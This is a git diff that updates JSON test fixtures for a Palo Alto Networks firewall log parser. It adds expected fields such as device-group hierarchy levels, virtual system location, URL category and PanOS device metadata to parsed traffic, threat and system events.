diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json index ab8aae097..3e52f494c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json @@ -30,6 +30,11 @@ "serial_number": "11111114444" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", "Threat_ContentType": "auth" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json index 49c1758ab..eb10d6148 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json @@ -49,7 +49,8 @@ "serial_number": "1801016000" }, "paloalto": { - "Threat_ContentType": "start" + "Threat_ContentType": "start", + "VirtualLocation": "vsys1234" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json index c4c2b4c70..3af5d5428 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json @@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url-filtering" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json index 17ae8dd31..5e1cc96a9 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dhcp" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json index 72af37535..f4541dcbf 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dnsproxy" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index ee2f64323..3142ed671 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -60,8 +60,14 @@ "serial_number": "no-serial" }, "paloalto": { + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "467", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", - "Threat_ContentType": "file" + "Threat_ContentType": "file", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index aa4388311..f08a677ef 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -37,7 +37,9 @@ "serial_number": "PF000000" }, "paloalto": { + "EventID": "gateway-switch-to-ssl", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "tunnel" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json index ed54db08a..bbf2d4e97 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json index 6ba2ed95f..aab8fbd6b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json @@ -51,7 +51,12 @@ "serial_number": "012001002253" }, "paloalto": { + "DGHierarchyLevel1": "24", + "DGHierarchyLevel2": "315", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "id": "40005", "name": "LDAP: User Login Brute Force Attempt" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json index f5f961342..610ab7c24 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json @@ -73,8 +73,14 @@ "serial_number": "007954000XXXXXX" }, "paloalto": { + "DGHierarchyLevel1": "999", + "DGHierarchyLevel2": "1111", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", - "Threat_ContentType": "file" + "Threat_ContentType": "file", + "URLCategory": "business-and-economy", + "VirtualLocation": "vsys1" }, "related": { "ip": [ 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 501fb4be5..25db7ff0a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -38,7 +38,12 @@ "version": "0.0.-1" }, "paloalto": { + "DGHierarchyLevel1": "556", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "globalprotect", + "VirtualSystemID": "1", "connection": { "stage": "logout" }, diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json index 80edd7cf5..c3d742b70 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json @@ -62,8 +62,13 @@ "serial_number": "007954000370000" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "1169", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "category": "brute-force", "id": "SSH User Authentication Brute Force Attempt(40015)" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json index 6a5a4358f..b4a75c57c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json 
@@ -64,8 +64,14 @@ "serial_number": "00795400037XXXX" }, "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "1169", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json index 1ad423127..a470b3176 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json @@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "ntpd" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json index ed9754708..af31efa35 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json @@ -36,6 +36,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "port" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json index 76aeaa4ce..c9ebd467e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json @@ -36,6 +36,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "fb" }, "related": { 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json index c773195d0..2d21571e0 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json @@ -30,6 +30,11 @@ "serial_number": "016201000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "test-event", "Threat_ContentType": "vpn" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json index 70c358caf..8a299b691 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json @@ -34,6 +34,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json index b481b6c39..4b7dc612f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url-filtering" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json index 989c8393e..7901b05ce 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "dhcp" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json index a92e1d91b..30a9a9970 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json index c546509c6..f74ff5a47 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json index 452b9d6bb..8c122fc65 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json index 4b2a51b0f..524aef010 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json index 36807c11d..f305c2d3e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json index a83bce94f..63f3bd258 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json index 548954584..a00e82987 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json 
@@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json index cd41f06d0..9cb10263a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json @@ -33,6 +33,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json index 2130588d1..2aa5ce29e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json @@ -30,6 +30,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json index db55cc61a..48dc1f1bd 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json @@ -47,7 +47,12 @@ "serial_number": "016201000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url", + "VirtualLocation": "vsys1", "threat": { "id": "9999" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json index 196fc9c0c..e45d01607 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json @@ -57,7 +57,12 @@ "serial_number": "012345678910" }, "paloalto": { + "DGHierarchyLevel1": "320", + "DGHierarchyLevel2": "90", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", "threat": { "id": "95187", "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json index bc3ccb698..d2e4e4775 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json @@ -30,6 +30,11 @@ "serial_number": "026701002348" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "general", "Threat_ContentType": "general" } } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json index cc477a27e..c0f834538 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json @@ -59,7 +59,13 @@ "serial_number": "007954000351998" }, "paloalto": { - "Threat_ContentType": "end" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" }, "related": { "ip": [ 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json index 72bc384fb..cfa92faf3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json @@ -59,7 +59,13 @@ "serial_number": "007954000351998" }, "paloalto": { - "Threat_ContentType": "end" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json index 4657c725b..2f58900ab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json index b22a31f88..9a1d42f34 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json index 9f659a601..ea53d3353 100644 
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json @@ -29,6 +29,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "auth" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json index d2477e4f1..dee27d0e1 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json @@ -30,7 +30,14 @@ "serial_number": "01545100000000" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json index a3738eaf2..23d0aaaf8 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json @@ -32,6 +32,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "general" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json index 42b530f45..c3b8bcffc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json 
@@ -37,6 +37,10 @@ "product": "PAN-OS" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "fb" }, "related": { diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json index 4e097a01e..b6430085e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json @@ -59,7 +59,13 @@ "serial_number": "016401004874" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "url", + "VirtualLocation": "vsys", + "VirtualSystemName": "VSYS", "threat": { "id": "9999" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json index 207cd20b3..afc856776 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json @@ -72,6 +72,24 @@ }, "paloalto": { "DirectionOfAttack": "server to client", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "X-Phone", + "PanOSDestinationDeviceHost": "pan-622", + "PanOSDestinationDeviceMac": "620797415366", + "PanOSDestinationDeviceModel": "MI", + "PanOSDestinationDeviceOSFamily": "A1", + "PanOSDestinationDeviceOSVersion": "Android v9.1", + "PanOSDestinationDeviceProfile": "x-profile", + "PanOSDestinationDeviceVendor": "Xiaomi", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceDeviceHost": "pan-505", + "PanOSSourceDeviceModel": "Note 4G", + "PanOSSourceDeviceProfile": "x-profile", + "PanOSSourceDeviceVendor": "Lenovo", + "PanOSSourceLocation": "LY", + "PanOSThreatCategory": "unknown", + "PanOSThreatID": "27379(27379)", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" }, 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json index cff329e0f..571880744 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json @@ -51,7 +51,12 @@ "serial_number": "001701000000" }, "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys", "threat": { "id": "34805", "name": "PDF Exploit Evasion Found" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json index b74fdb564..4fd068d08 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json @@ -72,6 +72,12 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSessionStartTime": "Jul 31 2022 12:43:06", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "LF-5698-NR" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json index 1469faf57..a892a2a7b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json @@ -72,6 +72,12 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSessionStartTime": "Aug 02 2022 06:41:44", + "PanOSSourceLocation": "10.0.0.0-10.255.255.255", + "URLCategory": "low-risk", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "GP cloud service" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json index 9bf8bd0de..58c77fa30 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json 
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json @@ -78,6 +78,29 @@ "version": "2.0" }, "paloalto": { + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "N-Phone", + "PanOSDestinationDeviceHost": "pan-355", + "PanOSDestinationDeviceMac": "530589561221", + "PanOSDestinationDeviceModel": "Nexus", + "PanOSDestinationDeviceOSFamily": "H1511", + "PanOSDestinationDeviceOSVersion": "Android v7", + "PanOSDestinationDeviceProfile": "n-profile", + "PanOSDestinationDeviceVendor": "Google", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSGPHostID": "xxxxxxxxxxxxxx", + "PanOSHASessionOwner": "session_owner-4", + "PanOSSessionStartTime": "Feb 27 2021 20:15:48", + "PanOSSourceDeviceHost": "pan-301", + "PanOSSourceDeviceModel": "Nexus", + "PanOSSourceDeviceProfile": "n-profile", + "PanOSSourceDeviceVendor": "Google", + "PanOSSourceDynamicAddressGroup": "aqua_dag", + "PanOSSourceLocation": "east-coast", + "PanOSX-Forwarded-ForIP": "1.1.1.1", + "URLCategory": "custom-category", + "VirtualLocation": "vsys1", "endpoint": { "serial_number": 